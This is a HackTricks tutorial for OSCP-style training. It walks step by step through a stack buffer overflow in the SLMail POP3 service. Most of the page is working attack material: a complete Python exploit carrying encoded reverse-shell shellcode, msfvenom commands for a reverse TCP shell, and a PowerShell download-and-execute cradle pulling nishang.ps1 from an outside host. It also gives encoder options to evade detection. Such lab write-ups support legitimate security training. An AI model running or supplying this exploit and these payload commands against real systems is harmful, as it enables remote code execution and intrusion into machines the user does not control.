Windows Exploiting (Basic Guide - OSCP lvl)

Support HackTricks and get benefits!
Start installing the SLMail service
Restart SLMail service
Every time you need to restart the service SLMail you can do it using the windows console:
1
net start slmail
Copied!
Very basic python exploit template
1
#!/usr/bin/python
2
​
3
import socket
4
​
5
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
6
ip = '10.11.25.153'
7
port = 110
8
​
9
buffer = 'A' * 2700
10
try:
11
    print "\nLaunching exploit..."
12
    s.connect((ip, port))
13
    data = s.recv(1024)
14
    s.send('USER username' +'\r\n')
15
    data = s.recv(1024)
16
    s.send('PASS ' + buffer + '\r\n')
17
    print "\nFinished!."
18
except:
19
    print "Could not connect to "+ip+":"+port
Copied!
Change Immunity Debugger Font
Go to Options >> Appearance >> Fonts >> Change(Consolas, Blod, 9) >> OK
Attach the proces to Immunity Debugger:
File --> Attach
And press START button
Send the exploit and check if EIP is affected:
Every time you break the service you should restart it as is indicated in the beginnig of this page.
Create a pattern to modify the EIP
The pattern should be as big as the buffer you used to broke the service previously.
1
/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 3000
Copied!
Change the buffer of the exploit and set the pattern and lauch the exploit.
A new crash should appeard, but with a different EIP address:
Check if the address was in your pattern:
1
/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -l 3000 -q 39694438
Copied!
Looks like we can modify the EIP in offset 2606 of the buffer.
Check it modifing the buffer of the exploit:
1
buffer = 'A'*2606 + 'BBBB' + 'CCCC'
Copied!
With this buffer the EIP crashed should point to 42424242 ("BBBB")
Looks like it is working.
Check for Shellcode space inside the stack
600B should be enough for any powerfull shellcode.
Lets change the bufer:
1
buffer = 'A'*2606 + 'BBBB' + 'C'*600
Copied!
launch the new exploit and check the EBP and the length of the usefull shellcode
You can see that when the vulnerability is reached, the EBP is pointing to the shellcode and that we have a lot of space to locate a shellcode here.
In this case we have from 0x0209A128 to 0x0209A2D6 = 430B. Enough.
Check for bad chars
Change again the buffer:
1
badchars = (
2
"\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10"
3
"\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20"
4
"\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30"
5
"\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40"
6
"\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50"
7
"\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60"
8
"\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70"
9
"\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80"
10
"\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90"
11
"\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0"
12
"\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0"
13
"\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0"
14
"\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0"
15
"\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0"
16
"\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0"
17
"\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff"
18
)
19
buffer = 'A'*2606 + 'BBBB' + badchars
Copied!
The badchars starts in 0x01 because 0x00 is almost always bad.
Execute repeatedly the exploit with this new buffer delenting the chars that are found to be useless:.
For example:
In this case you can see that you shouldn't use the char 0x0A (nothing is saved in memory since the char 0x09).
In this case you can see that the char 0x0D is avoided:
Find a JMP ESP as a return address
Using:
1
!mona modules    #Get protections, look for all false except last one (Dll of SO)
Copied!
You will list the memory maps. Search for some DLl that has:
Rebase: False
SafeSEH: False
ASLR: False
NXCompat: False
OS Dll: True
Now, inside this memory you should find some JMP ESP bytes, to do that execute:
1
!mona find -s "\xff\xe4" -m name_unsecure.dll # Search for opcodes insie dll space (JMP ESP)
2
!mona find -s "\xff\xe4" -m slmfc.dll # Example in this case
Copied!
Then, if some address is found, choose one that don't contain any badchar:
In this case, for example: _0x5f4a358f_
Create shellcode
1
msfvenom -p windows/shell_reverse_tcp LHOST=10.11.0.41 LPORT=443 -f c -b '\x00\x0a\x0d'
2
msfvenom -a x86 --platform Windows -p windows/exec CMD="powershell \"IEX(New-Object Net.webClient).downloadString('http://10.11.0.41/nishang.ps1')\"" -f python -b '\x00\x0a\x0d'
Copied!
If the exploit is not working but it should (you can see with ImDebg that the shellcode is reached), try to create other shellcodes (msfvenom with create different shellcodes for the same parameters).
Add some NOPS at the beginning of the shellcode and use it and the return address to JMP ESP, and finish the exploit:
1
#!/usr/bin/python
2
​
3
import socket
4
​
5
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
6
ip = '10.11.25.153'
7
port = 110
8
​
9
shellcode = (
10
"\xb8\x30\x3f\x27\x0c\xdb\xda\xd9\x74\x24\xf4\x5d\x31\xc9\xb1"
11
"\x52\x31\x45\x12\x83\xed\xfc\x03\x75\x31\xc5\xf9\x89\xa5\x8b"
12
"\x02\x71\x36\xec\x8b\x94\x07\x2c\xef\xdd\x38\x9c\x7b\xb3\xb4"
13
"\x57\x29\x27\x4e\x15\xe6\x48\xe7\x90\xd0\x67\xf8\x89\x21\xe6"
14
"\x7a\xd0\x75\xc8\x43\x1b\x88\x09\x83\x46\x61\x5b\x5c\x0c\xd4"
15
"\x4b\xe9\x58\xe5\xe0\xa1\x4d\x6d\x15\x71\x6f\x5c\x88\x09\x36"
16
"\x7e\x2b\xdd\x42\x37\x33\x02\x6e\x81\xc8\xf0\x04\x10\x18\xc9"
17
"\xe5\xbf\x65\xe5\x17\xc1\xa2\xc2\xc7\xb4\xda\x30\x75\xcf\x19"
18
"\x4a\xa1\x5a\xb9\xec\x22\xfc\x65\x0c\xe6\x9b\xee\x02\x43\xef"
19
"\xa8\x06\x52\x3c\xc3\x33\xdf\xc3\x03\xb2\x9b\xe7\x87\x9e\x78"
20
"\x89\x9e\x7a\x2e\xb6\xc0\x24\x8f\x12\x8b\xc9\xc4\x2e\xd6\x85"
21
"\x29\x03\xe8\x55\x26\x14\x9b\x67\xe9\x8e\x33\xc4\x62\x09\xc4"
22
"\x2b\x59\xed\x5a\xd2\x62\x0e\x73\x11\x36\x5e\xeb\xb0\x37\x35"
23
"\xeb\x3d\xe2\x9a\xbb\x91\x5d\x5b\x6b\x52\x0e\x33\x61\x5d\x71"
24
"\x23\x8a\xb7\x1a\xce\x71\x50\x2f\x04\x79\x89\x47\x18\x79\xd8"
25
"\xcb\x95\x9f\xb0\xe3\xf3\x08\x2d\x9d\x59\xc2\xcc\x62\x74\xaf"
26
"\xcf\xe9\x7b\x50\x81\x19\xf1\x42\x76\xea\x4c\x38\xd1\xf5\x7a"
27
"\x54\xbd\x64\xe1\xa4\xc8\x94\xbe\xf3\x9d\x6b\xb7\x91\x33\xd5"
28
"\x61\x87\xc9\x83\x4a\x03\x16\x70\x54\x8a\xdb\xcc\x72\x9c\x25"
29
"\xcc\x3e\xc8\xf9\x9b\xe8\xa6\xbf\x75\x5b\x10\x16\x29\x35\xf4"
30
"\xef\x01\x86\x82\xef\x4f\x70\x6a\x41\x26\xc5\x95\x6e\xae\xc1"
31
"\xee\x92\x4e\x2d\x25\x17\x7e\x64\x67\x3e\x17\x21\xf2\x02\x7a"
32
"\xd2\x29\x40\x83\x51\xdb\x39\x70\x49\xae\x3c\x3c\xcd\x43\x4d"
33
"\x2d\xb8\x63\xe2\x4e\xe9"
34
)
35
​
36
buffer = 'A' * 2606 + '\x8f\x35\x4a\x5f' + "\x90" * 8 + shellcode
37
try:
38
    print "\nLaunching exploit..."
39
    s.connect((ip, port))
40
    data = s.recv(1024)
41
    s.send('USER username' +'\r\n')
42
    data = s.recv(1024)
43
    s.send('PASS ' + buffer + '\r\n')
44
    print "\nFinished!."
45
except:
46
    print "Could not connect to "+ip+":"+port
Copied!
There are shellcodes that will overwrite themselves, therefore it's important to always add some NOPs before the shellcode
Improving the shellcode
Add this parameters:
1
EXITFUNC=thread -e x86/shikata_ga_nai
Copied!
Support HackTricks and get benefits!